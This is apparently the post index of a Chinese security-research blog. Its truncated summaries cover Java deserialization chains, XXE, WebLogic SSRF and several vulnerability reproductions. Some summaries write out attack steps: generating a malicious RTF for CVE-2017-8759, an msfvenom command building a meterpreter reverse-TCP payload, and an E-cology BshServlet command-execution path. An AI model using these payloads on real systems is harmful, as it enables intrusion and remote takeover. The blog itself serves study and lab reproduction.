Loading

摘要: 上篇文章讲到CC3的TransformedMap链,这篇我们就来讲一下LazyMap链。 其实LazyMap链还是使用的TemplatesImpl承载payload,InstantiateTransformer、TrAXFilter、ChainedTransformer这三个来构造调用链。 和另一条 阅读全文
posted @ 2021-07-10 17:10 Atomovo 阅读(46) 评论(0) 推荐(0) 编辑
摘要: CC3的利用链在JDK8u71版本以后是无法使用的,具体还是由于AnnotationInvocationHandler的readobject进行了改写。 而CC3目前有两条主流的利用链,利用TransformedMap或者LazyMap。我们这篇文章先讲TransformedMap链 Templat 阅读全文
posted @ 2021-07-10 17:07 Atomovo 阅读(63) 评论(0) 推荐(0) 编辑
摘要: JAVA安全基础之代理模式(二) 上篇讲到静态代理模式,这时候我们发现,一个代理类只能为一个类服务,如果需要代理的类很多,那么就需要编写大量的代理类,比较繁琐。所以就有了动态代理 动态代理 动态代理的代理类,是在内存中构建代理对象,从而实现对目标对象的代理功能。 在这里我们需要知道两个类:1.Inv 阅读全文
posted @ 2021-06-26 17:01 Atomovo 阅读(168) 评论(0) 推荐(0) 编辑
摘要: JAVA安全基础之代理模式(一) 代理模式是java的一种很常用的设计模式,理解代理模式,在我们进行java代码审计时候是非常有帮助的。 静态代理 代理,或者称为 Proxy ,简单理解就是事情我不用去做,由其他人来替我完成。在黄勇《架构探险》一书中,我觉得很有意思的一句相关介绍是这么说的: 赚钱方 阅读全文
posted @ 2021-06-24 18:09 Atomovo 阅读(105) 评论(0) 推荐(0) 编辑
摘要: JAVA安全基础之反射 在JAVA安全中,反射是一个经常使用的技术,所以熟悉使用反射是非常必要的。下面就简单的讲下JAVA的反射的用法 什么是反射 每个类都有对应的Class类对象,该Class类对象包含该类的属性、方法等信息,这个Class类对象就是这个类的反射。 就像镜子一样,一个类照镜子后,镜 阅读全文
posted @ 2021-06-22 13:58 Atomovo 阅读(94) 评论(0) 推荐(0) 编辑
摘要: ysoserial CommonsColletions2分析 前言 此文章是ysoserial中 commons-collections2 的分析文章,所需的知识包括java反射,javassist。 在CC2中是用的 PriorityQueue#reaObject作为反序列化的入口,利用javas 阅读全文
posted @ 2021-06-22 01:03 Atomovo 阅读(186) 评论(0) 推荐(0) 编辑
摘要: XXE从0到1 1. XXE概述 XXE(XML External Entity Injection)即XML外部实体注入。漏洞是在对不安全的外部实体数据进行处理时引发的安全问题。 下面我们主要介绍PHP语言下的XXE攻击. 1.1 XML基础 XML是可扩展的标记语言(eXtensible Mar 阅读全文
posted @ 2021-06-09 22:44 Atomovo 阅读(197) 评论(0) 推荐(0) 编辑
摘要: JAVA安全审计 ysoserial CommonsColletions1分析 前言: 在ysoserial工具中,并没有使用TransformedMap的来触发ChainedTransformer链,而是用了LazyMap的get方法 CommonsCollections1 调用链: /* Gad 阅读全文
posted @ 2021-05-21 23:27 Atomovo 阅读(258) 评论(2) 推荐(1) 编辑
摘要: weblogic远程调试 这里我们使用vulhub的镜像作为初始构建镜像搭建漏洞环境 1. 搭建docker环境 新建一个目录,创建两个文件 DockerFile FROM vulhub/weblogic:10.3.6.0-2017 ENV debugFlag true EXPOSE 7001 EX 阅读全文
posted @ 2021-05-21 23:26 Atomovo 阅读(881) 评论(0) 推荐(1) 编辑
摘要: Java反序列化漏洞Apache CommonsCollections分析 cc链,既为Commons-Collections利用链。此篇文章为cc链的第一条链CC1。而CC1目前用的比较多的有两条链,LazyMap和TransformedMap。在ysoserial工具中,利用的是LazyMap链 阅读全文
posted @ 2021-05-17 15:37 Atomovo 阅读(1595) 评论(0) 推荐(0) 编辑
摘要: JAVA反序列化漏洞基础原理 1.1 什么是序列化和反序列化? Java序列化是指把Java对象转换为字节序列的过程; Java反序列化是指把字节序列恢复为Java对象的过程; 1.2 为什么要序列化 对象不只是存储在内存中,它还需要在传输网络中进行传输,并且保存起来之后下次再加载出来,这时候就需要 阅读全文
posted @ 2021-05-11 16:17 Atomovo 阅读(2877) 评论(0) 推荐(1) 编辑
摘要: IDEA SpotBugs代码安全审计插件 在寻找idea代码审计插件的时候,发现Findbugs已经停止更新,无法在idea2020.01版本运行,由此找到SpotBugs SpotBugs介绍 SpotBugs是Findbugs的继任者(Findbugs已经于2016年后不再维护),用于对代码进 阅读全文
posted @ 2021-04-18 08:48 Atomovo 阅读(2008) 评论(0) 推荐(0) 编辑
摘要: JEECG代码审计之文件上传 0x01 简述 JEECG(J2EE Code Generation)是一款基于代码生成器JEE的智能开发平台。引领新的开发模式(Online Coding->代码生成器->手工MERGE智能开发),可以帮助解决Java项目90%的重复工作,让开发更多关注业务逻辑。既能 阅读全文
posted @ 2021-04-01 17:50 Atomovo 阅读(2587) 评论(0) 推荐(0) 编辑
摘要: kali下载python脚本,生成rtf文件: **下载脚本:**git clone https://github.com/bhdresh/CVE-2017-8759.git 生成rtf文件: python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf 阅读全文
posted @ 2021-03-17 17:27 Atomovo 阅读(208) 评论(0) 推荐(0) 编辑
摘要: 环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ​ 放到VPS上,这里我们放到本机搭 阅读全文
posted @ 2021-03-17 17:24 Atomovo 阅读(332) 评论(0) 推荐(0) 编辑
摘要: # -*-coding:utf-8-*- # @Author:malphite.tang import json import requests from queue import Queue requests.packages.urllib3.disable_warnings() # 消除eque 阅读全文
posted @ 2021-03-17 09:00 Atomovo 阅读(385) 评论(0) 推荐(0) 编辑
摘要: python2语法:python -m SimpleHTTPServer python3语法:python -m http.server 在局域网中使用web去访问http:/IP:8000即可 可以指定端口号: python -m SimpleHTTPServer 8111 可以指定路径: cd到 阅读全文
posted @ 2021-03-16 21:07 Atomovo 阅读(160) 评论(0) 推荐(0) 编辑
摘要: 一、环境搭建和知识储备 1.1、影响版本 漏洞编号:CVE-2014-4210 weblogic 10.0.2.0 weblogic 10.3.6.0 1.2、Docker搭建环境 1.进入vulhub/fastjson,启动docker即可 cd /root/vulhub/weblogic/ssr 阅读全文
posted @ 2021-03-16 20:57 Atomovo 阅读(549) 评论(0) 推荐(0) 编辑
摘要: 本地Markdown文件上传到博客 参考:https://www.cnblogs.com/ccylhw/p/13954153.html 1.Typora 最漂亮的写作APPhttps://www.typora.io/ 2.Typroa到博客园 第一步:下载dotnet-sdk并安装 dotnet下载 阅读全文
posted @ 2021-03-16 20:17 Atomovo 阅读(316) 评论(1) 推荐(2) 编辑
摘要: 漏洞复现 影响版本: E-cology 7.0 E-cology 8.0 E-cology 8.1 E-cology 9.0 直接在网站根目录后加入组件访问路径 /weaver/bsh.servlet.BshServlet/,如下图执行了命令“whoami” 绕过方式: 1.unicode编码 2. 阅读全文
posted @ 2021-03-16 17:35 Atomovo 阅读(2817) 评论(0) 推荐(0) 编辑